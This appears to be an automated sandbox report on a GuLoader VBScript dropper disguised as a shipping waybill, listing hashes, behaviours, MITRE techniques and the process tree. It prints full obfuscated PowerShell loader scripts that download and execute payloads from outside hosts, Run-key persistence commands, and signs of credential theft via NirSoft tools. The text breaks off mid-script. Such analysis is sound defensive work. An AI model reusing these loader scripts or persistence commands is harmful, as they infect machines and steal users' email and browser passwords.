guloader | 5ff48cae59e91a2c7cdeb79cecf1c55395eb97c78792dd0447ba43595510f219

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
26-06-2024 08:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbs
Size

187KB
MD5

298320f7d69c921e9c7b012b9d5d1b18
SHA1

fdd4a9fb56b627744d813803fb98bbf741c32b36
SHA256

5ff48cae59e91a2c7cdeb79cecf1c55395eb97c78792dd0447ba43595510f219
SHA512

cb7648d505a222fcac46a4c20ed503bf6f168f7b321676f0fa6a99d7c8bf97a122965a460ea8d62efeed918e3a816c968a8e6e787abf8a66fb789b521a538457
SSDEEP

3072:3mN8GGebKjeK3ubth+DCFxKCvBB/WnHPP1w/sLJFJ281QIHz1y8mNy7Ey1MgKTZi:308GxbKja3+DCbKCvBB/WnHXC/sLJFJb

Score

10^/10

guloader collection downloader persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
NirSoft MailPassView 2 IoCs
Password recovery tool for various email clients

Processes:

resource yara_rule

behavioral2/memory/1492-69-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView
behavioral2/memory/4912-143-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView

resource	yara_rule
behavioral2/memory/1492-69-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral2/memory/4912-143-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 2 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral2/memory/412-64-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral2/memory/3676-142-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 6 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1616-71-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/1492-69-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/412-64-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/2624-149-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/4912-143-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/3676-142-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

Blocklisted process makes network request 3 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

flow pid process

4 4080 WScript.exe
21 4508 powershell.exe
60 3260 powershell.exe

flow	pid	process
4	4080	WScript.exe
21	4508	powershell.exe
60	3260	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exeWScript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 2 IoCs

collection

Email Collection

T1114

Processes:

wab.exewab.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	wab.exe
Key opened	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	wab.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Soget = "%Equiexcellency% -w 1 $Neosorex38=(Get-ItemProperty -Path 'HKCU:\\Submicron\\').Velkommenteret;%Equiexcellency% ($Neosorex38)"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rollingerne = "%Montuvio% -w 1 $Lkapsler=(Get-ItemProperty -Path 'HKCU:\\overdeferential\\').retoucheres;%Montuvio% ($Lkapsler)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 4 IoCs

Processes:

wab.exewab.exe

pid process

2072 wab.exe
2072 wab.exe
4908 wab.exe
4908 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

powershell.exewab.exepowershell.exewab.exe

pid process

2044 powershell.exe
2072 wab.exe
4052 powershell.exe
4908 wab.exe

pid	process
2072	wab.exe
2072	wab.exe
4908	wab.exe
4908	wab.exe

pid	process
2044	powershell.exe
2072	wab.exe
4052	powershell.exe
4908	wab.exe

Suspicious use of SetThreadContext 8 IoCs

Processes:

powershell.exewab.exepowershell.exe

description	pid	process	target process
PID 2044 set thread context of 2072	2044	powershell.exe	wab.exe
PID 2072 set thread context of 412	2072	wab.exe	wab.exe
PID 2072 set thread context of 1492	2072	wab.exe	wab.exe
PID 2072 set thread context of 1616	2072	wab.exe	wab.exe
PID 4052 set thread context of 4908	4052	powershell.exe	wab.exe
PID 2072 set thread context of 3676	2072	wab.exe	wab.exe
PID 2072 set thread context of 4912	2072	wab.exe	wab.exe
PID 2072 set thread context of 2624	2072	wab.exe	wab.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

wab.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings wab.exe
Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

3836 reg.exe
2652 reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\Local Settings	wab.exe

pid	process
3836	reg.exe
2652	reg.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

Processes:

powershell.exepowershell.exewab.exewab.exepowershell.exepowershell.exewab.exewab.exewab.exepowershell.exe

pid	process
4508	powershell.exe
4508	powershell.exe
2044	powershell.exe
2044	powershell.exe
2044	powershell.exe
412	wab.exe
412	wab.exe
1616	wab.exe
1616	wab.exe
412	wab.exe
412	wab.exe
3260	powershell.exe
3260	powershell.exe
4052	powershell.exe
4052	powershell.exe
4052	powershell.exe
4908	wab.exe
4908	wab.exe
4908	wab.exe
4908	wab.exe
4908	wab.exe
4908	wab.exe
4908	wab.exe
4908	wab.exe
4908	wab.exe
4908	wab.exe
4908	wab.exe
4908	wab.exe
4908	wab.exe
4908	wab.exe
3676	wab.exe
3676	wab.exe
3676	wab.exe
2624	wab.exe
3676	wab.exe
2624	wab.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe

Suspicious behavior: MapViewOfSection 10 IoCs

Processes:

powershell.exewab.exepowershell.exe

pid process

2044 powershell.exe
2072 wab.exe
2072 wab.exe
2072 wab.exe
4052 powershell.exe
4052 powershell.exe
4052 powershell.exe
2072 wab.exe
2072 wab.exe
2072 wab.exe

pid	process
2044	powershell.exe
2072	wab.exe
2072	wab.exe
2072	wab.exe
4052	powershell.exe
4052	powershell.exe
4052	powershell.exe
2072	wab.exe
2072	wab.exe
2072	wab.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exewab.exepowershell.exepowershell.exewab.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4508	powershell.exe
Token: SeDebugPrivilege	2044	powershell.exe
Token: SeDebugPrivilege	1616	wab.exe
Token: SeDebugPrivilege	3260	powershell.exe
Token: SeDebugPrivilege	4052	powershell.exe
Token: SeDebugPrivilege	2624	wab.exe
Token: SeDebugPrivilege	4572	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

wab.exe

pid process

2072 wab.exe

pid	process
2072	wab.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.exepowershell.exepowershell.exewab.execmd.exeWScript.exepowershell.exepowershell.exewab.execmd.exe

description	pid	process	target process
PID 4080 wrote to memory of 4508	4080	WScript.exe	powershell.exe
PID 4080 wrote to memory of 4508	4080	WScript.exe	powershell.exe
PID 4508 wrote to memory of 4040	4508	powershell.exe	cmd.exe
PID 4508 wrote to memory of 4040	4508	powershell.exe	cmd.exe
PID 4508 wrote to memory of 2044	4508	powershell.exe	powershell.exe
PID 4508 wrote to memory of 2044	4508	powershell.exe	powershell.exe
PID 4508 wrote to memory of 2044	4508	powershell.exe	powershell.exe
PID 2044 wrote to memory of 4912	2044	powershell.exe	cmd.exe
PID 2044 wrote to memory of 4912	2044	powershell.exe	cmd.exe
PID 2044 wrote to memory of 4912	2044	powershell.exe	cmd.exe
PID 2044 wrote to memory of 2072	2044	powershell.exe	wab.exe
PID 2044 wrote to memory of 2072	2044	powershell.exe	wab.exe
PID 2044 wrote to memory of 2072	2044	powershell.exe	wab.exe
PID 2044 wrote to memory of 2072	2044	powershell.exe	wab.exe
PID 2044 wrote to memory of 2072	2044	powershell.exe	wab.exe
PID 2072 wrote to memory of 4404	2072	wab.exe	cmd.exe
PID 2072 wrote to memory of 4404	2072	wab.exe	cmd.exe
PID 2072 wrote to memory of 4404	2072	wab.exe	cmd.exe
PID 4404 wrote to memory of 2652	4404	cmd.exe	reg.exe
PID 4404 wrote to memory of 2652	4404	cmd.exe	reg.exe
PID 4404 wrote to memory of 2652	4404	cmd.exe	reg.exe
PID 2072 wrote to memory of 412	2072	wab.exe	wab.exe
PID 2072 wrote to memory of 412	2072	wab.exe	wab.exe
PID 2072 wrote to memory of 412	2072	wab.exe	wab.exe
PID 2072 wrote to memory of 412	2072	wab.exe	wab.exe
PID 2072 wrote to memory of 1492	2072	wab.exe	wab.exe
PID 2072 wrote to memory of 1492	2072	wab.exe	wab.exe
PID 2072 wrote to memory of 1492	2072	wab.exe	wab.exe
PID 2072 wrote to memory of 1492	2072	wab.exe	wab.exe
PID 2072 wrote to memory of 1616	2072	wab.exe	wab.exe
PID 2072 wrote to memory of 1616	2072	wab.exe	wab.exe
PID 2072 wrote to memory of 1616	2072	wab.exe	wab.exe
PID 2072 wrote to memory of 1616	2072	wab.exe	wab.exe
PID 2072 wrote to memory of 3840	2072	wab.exe	WScript.exe
PID 2072 wrote to memory of 3840	2072	wab.exe	WScript.exe
PID 2072 wrote to memory of 3840	2072	wab.exe	WScript.exe
PID 3840 wrote to memory of 3260	3840	WScript.exe	powershell.exe
PID 3840 wrote to memory of 3260	3840	WScript.exe	powershell.exe
PID 3840 wrote to memory of 3260	3840	WScript.exe	powershell.exe
PID 3260 wrote to memory of 3256	3260	powershell.exe	cmd.exe
PID 3260 wrote to memory of 3256	3260	powershell.exe	cmd.exe
PID 3260 wrote to memory of 3256	3260	powershell.exe	cmd.exe
PID 3260 wrote to memory of 4052	3260	powershell.exe	powershell.exe
PID 3260 wrote to memory of 4052	3260	powershell.exe	powershell.exe
PID 3260 wrote to memory of 4052	3260	powershell.exe	powershell.exe
PID 4052 wrote to memory of 4620	4052	powershell.exe	cmd.exe
PID 4052 wrote to memory of 4620	4052	powershell.exe	cmd.exe
PID 4052 wrote to memory of 4620	4052	powershell.exe	cmd.exe
PID 4052 wrote to memory of 4516	4052	powershell.exe	wab.exe
PID 4052 wrote to memory of 4516	4052	powershell.exe	wab.exe
PID 4052 wrote to memory of 4516	4052	powershell.exe	wab.exe
PID 4052 wrote to memory of 448	4052	powershell.exe	wab.exe
PID 4052 wrote to memory of 448	4052	powershell.exe	wab.exe
PID 4052 wrote to memory of 448	4052	powershell.exe	wab.exe
PID 4052 wrote to memory of 4908	4052	powershell.exe	wab.exe
PID 4052 wrote to memory of 4908	4052	powershell.exe	wab.exe
PID 4052 wrote to memory of 4908	4052	powershell.exe	wab.exe
PID 4052 wrote to memory of 4908	4052	powershell.exe	wab.exe
PID 4052 wrote to memory of 4908	4052	powershell.exe	wab.exe
PID 4908 wrote to memory of 1152	4908	wab.exe	cmd.exe
PID 4908 wrote to memory of 1152	4908	wab.exe	cmd.exe
PID 4908 wrote to memory of 1152	4908	wab.exe	cmd.exe
PID 1152 wrote to memory of 3836	1152	cmd.exe	reg.exe
PID 1152 wrote to memory of 3836	1152	cmd.exe	reg.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4080

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Probabl Prothallus Eparchs Bilkirkegaarde Galdesyges Halibut Receptionschefers Programnrt Jordfordelingers Gentofte havanese Ancillae groundhog Orsino aneurilemmic Sponsores Orv Suwe Elorgelets Millionvises Hypochnus Djvelskaben Lejekasernerne Bargander Probabl Prothallus Eparchs Bilkirkegaarde Galdesyges Halibut Receptionschefers Programnrt Jordfordelingers Gentofte havanese Ancillae groundhog Orsino aneurilemmic Sponsores Orv Suwe Elorgelets Millionvises Hypochnus Djvelskaben Lejekasernerne Bargander';$Dominikanermunkene = 1;Function Hierarchist($ydrelrens){$Rendegarnet=$ydrelrens.Length-$Dominikanermunkene;$Confessionals='SUBSTRIN';$Confessionals+='G';For( $Pupperne=1;$Pupperne -lt $Rendegarnet;$Pupperne+=2){$Probabl+=$ydrelrens.$Confessionals.Invoke( $Pupperne, $Dominikanermunkene);}$Probabl;}function Fjollehovedernes($thiophenic){ & ($Kirkebgerne) ($thiophenic);}$Hemmeligholder78=Hierarchist 'MM o.zOiglbl a /N5D..0, K(PW.iPn dFo w sA .NOT ,1 0 .I0 ;. .WFi,nT6.4D;, FxS6T4 ;. r,vS: 1r2M1P.W0 )W .G eIcSk o,/ 2A0K1S0 0 1P0,1W FFi rSeGfPoIx /H1 2 1 . 0O ';$Varnishment=Hierarchist 'SUAsHeMr -aA gRe n t ';$Galdesyges=Hierarchist ',h t t pWs : / / eCv,o.l uAxHc obnAtMaRbkialSiUd aSdNe,. c oSmY.,b rK/.p,tGs /CS,oDuMrDcAeAfNi.lMe rE7R4 .et opcr>LhAtCtDp : /F/S9 4W.Q1U5,6S. 8 .S8 8M/IStoSuKr,c.e.fSi,l eOrI7P4P. t o c ';$Sphakiot=Hierarchist ',>, ';$Kirkebgerne=Hierarchist 'Riee x. ';$Forpraktikanters73='Programnrt';$Brsnoteringens = Hierarchist 'Ne.cIhFoB % aFp pKdHa,t,a.%.\ FToUrSmTaTt,l i nBiFe t,e g nPsF1 9D1S. BBj e B&.&F PeVc,hSo, tg ';Fjollehovedernes (Hierarchist 'M$RgUlTo bBa lF:,G l y,c,oApoe xFi.aA= (RcIm dE ./FcA E$ BSr s.n.oPt,eRrgi nTgSe nMs )O ');Fjollehovedernes (Hierarchist ',$hgSl ofbNa l :DBRi lSk i rDk.e,g.aPa,rid e =B$.GVaNlAdDeMsTyRgSe,s .WsGp lDiRt ( $KS,pahBa.kJiFoStC) ');Fjollehovedernes (Hierarchist 'U[SNFe tH.SS,e rKvNiFcHegPUo,i,nEtDMIaDnHaUgAeIr ],:a: S e c u.rVibt.yCP r oAt oVc,oAlG =F [.NAePtd.,S.e cTuRrQi,t,y.Plr o t o.c o.lTT ySpSe ] :.:KTGlPsf1 2D ');$Galdesyges=$Bilkirkegaarde[0];$Modviljer= (Hierarchist 'R$SgMl o bCa l :FO.m pToUsAtMeFr,eN= NFe w.-EOUbWjOe.cEtE .Scy.sBt.e me..NReSt . W.e bVCClPi eMn t');$Modviljer+=$Glycopexia[1];Fjollehovedernes ($Modviljer);Fjollehovedernes (Hierarchist 'O$DO,m p oMsKt.eMr,eR. HPeDa dBeAras,[A$AV,aBr n,iTsBh,mAeSn.tP]B=O$AH.e.mRmSe lEiKg,hVoOl dUeDrF7U8 ');$Atomlaeren=Hierarchist 'D$ Onm,pDoHs tEe rFeH.,DMoNwSn,l,o.a dkFfirl eM( $.GBaMl,dAeRsBy gHe s,,I$,D jSv eMl,slkRa b.eSn )G ';$Djvelskaben=$Glycopexia[0];Fjollehovedernes (Hierarchist 'P$ gNlAo bCa lR: H aHw a.i,iBt,eB=.(,T eTsCt -APMaCtRhN B$.D.jAvOe l.sUk aMb eSnM)J ');while (!$Hawaiite) {Fjollehovedernes (Hierarchist 'G$.gtl,o b,a l :AT uAbTmUaPkGe.r =,$ tNr u.eL ') ;Fjollehovedernes $Atomlaeren;Fjollehovedernes (Hierarchist 'TS.tGa rCt -SSUlSe e p. N4, ');Fjollehovedernes (Hierarchist 'O$.gGl o bDa l.:NH aDw a i i.t e =.(,TSe.s,tA-RP,a.tHh $.D jIvSe l s.k,a,bAeHn )S ') ;Fjollehovedernes (Hierarchist 'R$ gUl o bCa lH:.E.p aJrFcShPsP=R$HgClso,b a lP:NPCrOo t h a lPl.uHs +.+S%.$MBSi lRkHi r k.eRgAa.aArbdSeT. caoNu nCtU ') ;$Galdesyges=$Bilkirkegaarde[$Eparchs];}$Nitrobacteria=349055;$kvindeskdene=24078;Fjollehovedernes (Hierarchist 'F$bgBlBo bbaDl :FJMo r d f.o r d,eTl i nTg.e,r,sS F= GAe tA-,CRoUn t e n t. $ D j v.e lTsJk.a b eFnF ');Fjollehovedernes (Hierarchist '.$Bg.l o,bpa lR: GTaHmPp hErFeTl =Z L[ SdySs tVe,m..OCmoBnFv e.r,t.]P:U:.Fkr o.mFB afs e 6R4,STt r iAn g.( $MJMoIr dBfFo r dde lIi n gEe.r,sG) ');Fjollehovedernes (Hierarchist ' $fgBl o bAa l.: A nDc.iVl lRaieN S= L[.S yOsntBeSmK..TAeLx t .,EEn cCo.dWiNnLg ]h:,:hA SHCPI,IU.SG e tSS t,r i n g,( $ GBaZm.pShHrTe,l ), ');Fjollehovedernes (Hierarchist ' $ gIl oTbFaBlF: V,aOr.mDeFpSu.dLe,sT7T8,=,$,Aan cEiEl.lSa,eF..sUuMbTs t rOiDn g (D$SNAi,tSrHo bTa,cSt,e r iFaH,,$Sk v iHn dReCsFk d eMn eS)N ');Fjollehovedernes $Varmepudes78;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4508

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Formatlinietegns191.Bje && echo t"
3⤵
PID:4040

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Probabl Prothallus Eparchs Bilkirkegaarde Galdesyges Halibut Receptionschefers Programnrt Jordfordelingers Gentofte havanese Ancillae groundhog Orsino aneurilemmic Sponsores Orv Suwe Elorgelets Millionvises Hypochnus Djvelskaben Lejekasernerne Bargander Probabl Prothallus Eparchs Bilkirkegaarde Galdesyges Halibut Receptionschefers Programnrt Jordfordelingers Gentofte havanese Ancillae groundhog Orsino aneurilemmic Sponsores Orv Suwe Elorgelets Millionvises Hypochnus Djvelskaben Lejekasernerne Bargander';$Dominikanermunkene = 1;Function Hierarchist($ydrelrens){$Rendegarnet=$ydrelrens.Length-$Dominikanermunkene;$Confessionals='SUBSTRIN';$Confessionals+='G';For( $Pupperne=1;$Pupperne -lt $Rendegarnet;$Pupperne+=2){$Probabl+=$ydrelrens.$Confessionals.Invoke( $Pupperne, $Dominikanermunkene);}$Probabl;}function Fjollehovedernes($thiophenic){ & ($Kirkebgerne) ($thiophenic);}$Hemmeligholder78=Hierarchist 'MM o.zOiglbl a /N5D..0, K(PW.iPn dFo w sA .NOT ,1 0 .I0 ;. .WFi,nT6.4D;, FxS6T4 ;. r,vS: 1r2M1P.W0 )W .G eIcSk o,/ 2A0K1S0 0 1P0,1W FFi rSeGfPoIx /H1 2 1 . 0O ';$Varnishment=Hierarchist 'SUAsHeMr -aA gRe n t ';$Galdesyges=Hierarchist ',h t t pWs : / / eCv,o.l uAxHc obnAtMaRbkialSiUd aSdNe,. c oSmY.,b rK/.p,tGs /CS,oDuMrDcAeAfNi.lMe rE7R4 .et opcr>LhAtCtDp : /F/S9 4W.Q1U5,6S. 8 .S8 8M/IStoSuKr,c.e.fSi,l eOrI7P4P. t o c ';$Sphakiot=Hierarchist ',>, ';$Kirkebgerne=Hierarchist 'Riee x. ';$Forpraktikanters73='Programnrt';$Brsnoteringens = Hierarchist 'Ne.cIhFoB % aFp pKdHa,t,a.%.\ FToUrSmTaTt,l i nBiFe t,e g nPsF1 9D1S. BBj e B&.&F PeVc,hSo, tg ';Fjollehovedernes (Hierarchist 'M$RgUlTo bBa lF:,G l y,c,oApoe xFi.aA= (RcIm dE ./FcA E$ BSr s.n.oPt,eRrgi nTgSe nMs )O ');Fjollehovedernes (Hierarchist ',$hgSl ofbNa l :DBRi lSk i rDk.e,g.aPa,rid e =B$.GVaNlAdDeMsTyRgSe,s .WsGp lDiRt ( $KS,pahBa.kJiFoStC) ');Fjollehovedernes (Hierarchist 'U[SNFe tH.SS,e rKvNiFcHegPUo,i,nEtDMIaDnHaUgAeIr ],:a: S e c u.rVibt.yCP r oAt oVc,oAlG =F [.NAePtd.,S.e cTuRrQi,t,y.Plr o t o.c o.lTT ySpSe ] :.:KTGlPsf1 2D ');$Galdesyges=$Bilkirkegaarde[0];$Modviljer= (Hierarchist 'R$SgMl o bCa l :FO.m pToUsAtMeFr,eN= NFe w.-EOUbWjOe.cEtE .Scy.sBt.e me..NReSt . W.e bVCClPi eMn t');$Modviljer+=$Glycopexia[1];Fjollehovedernes ($Modviljer);Fjollehovedernes (Hierarchist 'O$DO,m p oMsKt.eMr,eR. HPeDa dBeAras,[A$AV,aBr n,iTsBh,mAeSn.tP]B=O$AH.e.mRmSe lEiKg,hVoOl dUeDrF7U8 ');$Atomlaeren=Hierarchist 'D$ Onm,pDoHs tEe rFeH.,DMoNwSn,l,o.a dkFfirl eM( $.GBaMl,dAeRsBy gHe s,,I$,D jSv eMl,slkRa b.eSn )G ';$Djvelskaben=$Glycopexia[0];Fjollehovedernes (Hierarchist 'P$ gNlAo bCa lR: H aHw a.i,iBt,eB=.(,T eTsCt -APMaCtRhN B$.D.jAvOe l.sUk aMb eSnM)J ');while (!$Hawaiite) {Fjollehovedernes (Hierarchist 'G$.gtl,o b,a l :AT uAbTmUaPkGe.r =,$ tNr u.eL ') ;Fjollehovedernes $Atomlaeren;Fjollehovedernes (Hierarchist 'TS.tGa rCt -SSUlSe e p. N4, ');Fjollehovedernes (Hierarchist 'O$.gGl o bDa l.:NH aDw a i i.t e =.(,TSe.s,tA-RP,a.tHh $.D jIvSe l s.k,a,bAeHn )S ') ;Fjollehovedernes (Hierarchist 'R$ gUl o bCa lH:.E.p aJrFcShPsP=R$HgClso,b a lP:NPCrOo t h a lPl.uHs +.+S%.$MBSi lRkHi r k.eRgAa.aArbdSeT. caoNu nCtU ') ;$Galdesyges=$Bilkirkegaarde[$Eparchs];}$Nitrobacteria=349055;$kvindeskdene=24078;Fjollehovedernes (Hierarchist 'F$bgBlBo bbaDl :FJMo r d f.o r d,eTl i nTg.e,r,sS F= GAe tA-,CRoUn t e n t. $ D j v.e lTsJk.a b eFnF ');Fjollehovedernes (Hierarchist '.$Bg.l o,bpa lR: GTaHmPp hErFeTl =Z L[ SdySs tVe,m..OCmoBnFv e.r,t.]P:U:.Fkr o.mFB afs e 6R4,STt r iAn g.( $MJMoIr dBfFo r dde lIi n gEe.r,sG) ');Fjollehovedernes (Hierarchist ' $fgBl o bAa l.: A nDc.iVl lRaieN S= L[.S yOsntBeSmK..TAeLx t .,EEn cCo.dWiNnLg ]h:,:hA SHCPI,IU.SG e tSS t,r i n g,( $ GBaZm.pShHrTe,l ), ');Fjollehovedernes (Hierarchist ' $ gIl oTbFaBlF: V,aOr.mDeFpSu.dLe,sT7T8,=,$,Aan cEiEl.lSa,eF..sUuMbTs t rOiDn g (D$SNAi,tSrHo bTa,cSt,e r iFaH,,$Sk v iHn dReCsFk d eMn eS)N ');Fjollehovedernes $Varmepudes78;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2044

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Formatlinietegns191.Bje && echo t"
4⤵
PID:4912

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2072

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Soget" /t REG_EXPAND_SZ /d "%Equiexcellency% -w 1 $Neosorex38=(Get-ItemProperty -Path 'HKCU:\Submicron\').Velkommenteret;%Equiexcellency% ($Neosorex38)"
5⤵
- Suspicious use of WriteProcessMemory
PID:4404

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Soget" /t REG_EXPAND_SZ /d "%Equiexcellency% -w 1 $Neosorex38=(Get-ItemProperty -Path 'HKCU:\Submicron\').Velkommenteret;%Equiexcellency% ($Neosorex38)"
6⤵
- Adds Run key to start application
- Modifies registry key
PID:2652

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\vakujkwtnfybgdxojtdupplzytruqkwicf"
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:412

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\yuqfbc"
5⤵
- Accesses Microsoft Outlook accounts
PID:1492

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\iwdycvsop"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1616

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Poodle.vbs"
5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3840

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte';$Stileemnets = 1;Function Alert($Catoptrical){$Dispropriate=$Catoptrical.Length-$Stileemnets;$Cohesions='SUBSTRIN';$Cohesions+='G';For( $Kaliumklorider=1;$Kaliumklorider -lt $Dispropriate;$Kaliumklorider+=2){$Commixed+=$Catoptrical.$Cohesions.Invoke( $Kaliumklorider, $Stileemnets);}$Commixed;}function Xylografien($Disharmoner){ . ($Dragemanden) ($Disharmoner);}$Cigale=Alert 'PMSomzUiRlBlOaA/B5.. 0S b(TW iSnAdVoUwCsG .NrT 1 0D.S0 ;P .WsiOnX6U4N;, .x 6L4C; r,vF:.1 2T1 . 0B)O BG,ePc k o,/ 2U0 1T0u0S1A0N1. SF.i.rme f,o xD/ 1M2F1 .,0 ';$belieffulness=Alert ' U sHeFr.-TAtg eTnGtP ';$Bestemmelsesstedets=Alert ' hKt.t pHs : / / e.v,oMl.uBxGcFoTnWt.aEbSi.l iFd aEd e .,cKo ml. b rO/.x l oKaAd /FRPuHm nSe r . xot pT ';$Voldtog=Alert 'K>N ';$Dragemanden=Alert ' iGecx, ';$Sydvestenvinds='Afdelingsingenirs183';$Anglisterne = Alert ' eAcAh o %QaVpSpEdKa tGaP%o\BbCeElSe m nPo.iSdBeMaI.OF o,s, ,& & PeDc hPod t ';Xylografien (Alert 'D$ gKl oTbBa lS: FTo r r.eBtAn i,nUg sIocmIr,aUaFdBefr =B( c.mDd. / cB ,$AA nCg l,itsKt e,r nDe ) ');Xylografien (Alert '.$bg.lCo,b aKlQ:HBJe,rBtHo.lKo nDi.a =G$ B e s t,e mKm eKlSs eCsHsSt eOd,e tBs,. sUpSlNi tP(R$,V o.l d tEo gU)R ');Xylografien (Alert ' [ NOe tZ.LS eIr.vBiAc.eSP oCi,n tcMoa.n.aagIeer ]P:D:,S ePc u.rSiot.y PfrPo tFo c,o lB C=, B[HN e t..ESBe 